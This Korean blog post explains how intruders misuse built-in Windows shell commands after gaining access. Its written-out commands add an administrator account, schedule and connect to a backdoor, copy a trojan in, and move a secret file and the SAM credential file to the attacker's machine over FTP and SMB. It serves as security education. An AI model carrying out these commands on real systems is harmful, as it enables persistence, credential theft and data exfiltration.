본문 바로가기

잡다

기본 명령어




안녕하세요.

 

문보안관 입니다.

 

Windows 에서 기본적으로 제공하는 Shell 명령어들은 사용자에게 여러 편의성을 제공합니다.

 

관리자들은 이러한 SHell 명령어들을 이용해 시스템을 설정하고 유지하게 됩니다. 하지만 이러한 편의성을 제공하는

 

명령어들이 시스템에 침입한 해커가 사용하였을 경우 그 파급 효과는 엄청 납니다.

 

한번 해커들이 어떤식으로 Shell 명령어를 이용하는지 살펴 봅시다.

 

[ 취약한 환경 ]

 

Windows 2000/XP/2003

 

[해킹과정 및 결과]

 

1.  NET

 

임의의 IP를 이용, 계정과 패스워드를 알고 있다면 IPC$연결을 실행할 수 있다.

 

예를 들어 상대방의 IP가 192.168.0.10 이고 계정이 'i2Secadmin', 패스워드가 '12345' 라면 다음과 같은

 

명령을 사용하여 IPC$ 연결을 실행할 수 있다.

 

net use \\192.168.0.10\IPC$ 12345 /user:i2Secadmin

 

종료 방법은 다음과 같다.

 

net use \\192.168.0.10\ipc$ /delete

 

SA 권한은 시스템 최고 권한을 가진 사용자이다.

 

SA 권한의 사용자라면 다음과 같이 사용자 계정을 추가 할 수 있다.

 

계정이 'i2Sec' 패스워드가 'iipassword' 인 사용자를 추가한다.

 

net user i2Sec iipassword /add

 

이렇게 생성된 계정은 기본적으로 일반계정 이다. 다시 Net 명령을 이용하여 i2Sec 사용자를 관리자 그룹에 포함시킬 수 있다.

 

net localgroup administrators i2Sec /add

 

또한 상대방의 C드라이브를 로컬의 Z 디스크에 Mapping 시킬 수 있다. 물론 임의의 드라이브를 지정 할 수 있다.

 

net use z:\\192.168.0.10\c$

 

Net 명령은 서비스를 시작 하기 위해 사용할 수 있다. 만약 telnet 서비스를 시작하고자 한다면

 

net start telnet

 

이와 같이 Net 명령어 하나만으로도 사용자 계정 추가/삭제 서비스 제어까지도 가능하다.

 

2.AT

 

많은 침입자들이 시스템 획득 후 Backdoor 를 설치 하고 있다. 이렇게 Backdoor 를 설치한 후 지정 된 시간에 Backdoor를 실행하기 위해

 

AT 명령어를 이용한다.

 

우선 상대방 시스템의 LocalTime 을 알아 낸다.

 

C:\> net time \\192.168.0.10

 

\\192.168.0.10의 현재 시간은 2010-09-12 오전 11:00 입니다

\\192.168.0.10에서 (GMT +08:00) 로컬 시간이 2010-09-12 오전 10:00 입니다.

 

다음 이름이 'i2SecB4ckd00r.exe' 인 Backdoor를 상대방의 시스템에 Upload한 후 12:00 정각에 실행시키고자 한다면

 

다음과 같이 실행 할 수 있다. (i2SecB4ckd00r.exe 는 99번 포트를 사용한다)

 

c:\>at \\192.168.0.10 12:00 i2SecB4ckd00r.exe

 

3. TELNET

 

원격으로 상대방 시스템에 접속하여 시스템을 제어 할 수 있다. 여기서는 위에서 심어놓은 i2SecB4ckd00r.exe가 열어놓은 99번 포트에 연결

 

한다.

 

C:\>telnet 192.168.0.10 99

 

4. FTP

 

File Transfer Protocol 으로 상대방의 시스템에 로컬의 파일을 upload 하거나 상대방의 파일을 download 할 수 있다.

 

침입한 시스템(192.168.0.10) 에서 FTP 서비스가 실행중인 로컬(192.168.0.7)시스템에 접속한다.

 

C:\>ftp  192.168.0.7

 

계정과 패스워드를 입력한다. 로컬 시스템의 c:\index.html 파일을 침입시스템의 D:\ 업로드한다.

 

ftp>get c:\index.html d:\

 

같은 방식으로 침입시스템의 e:\i2Secsecret.xls 를 로컬시스템의 c:\에 다운로드 할 수 있다.

 

ftp>put e:\i2Secsecret.xls c:\

 

5. COPY

 

로컬의 파일을 상대방의 하드웨어에 copy 하기 위해선 IPC$ 연결이 되어 있어야 한다.

 

예를 들어 troy.exe 파일을 192.168.0.10 c:\ copy 하려면

 

c:\>copy troy.exe \\192.168.0.10\c$\troy.exe

 

만약 상대방의 SAM 파일을 로컬 시스템으로 가져오고 싶다면 다음과 같이 실행 할 수 있다.

 

c:\>copy \\192.168.0.10\admin$\repair\sam c:\

 

6. SYSTEMINFO

 

해당 시스템의 구성정보를 보여준다.

 

특히 Hotfix 설치 여부까지 출력하므로 패치되지 않은 취약점을 공략할 수 있다. (windows XP/2003 가능)

 

 

 

7. NBTSTAT

 

만약 NT 계열 시스템의 136 , 139 포트 중 하나가 열려 있다면 nbtstat 명령을 사용하여 Netbios over TCP / IP 정보를 획득 할 수 있다.

 

 

 

8. Shutdown

 

IPC$ 연결이 되어 있는 상태라면 shutdown 명령을 이용하여 상대방의 시스템을 종료시키거나 재부팅할수 있다.

 

특히 shutdown 명령은 -i 옵션을 이용하여 gui 형태로 실행 할 수 있다.

 

c:\>shutdown -i

 

시스템을 종료하는 것을 정지할 수도 있다. shutdown 명령에 -a 옵션을 주어 정지 시킬 수 있다.

 

c:\>shutdown -a

 

 

이상 해커들이 시스템 침입 후 자주 사용하는 Shell 명령어를 살펴 보았습니다

 

이외에 del, attrib 등 shell command 가 있습니다.

 

그럼 오늘도 좋은 하루 되세요.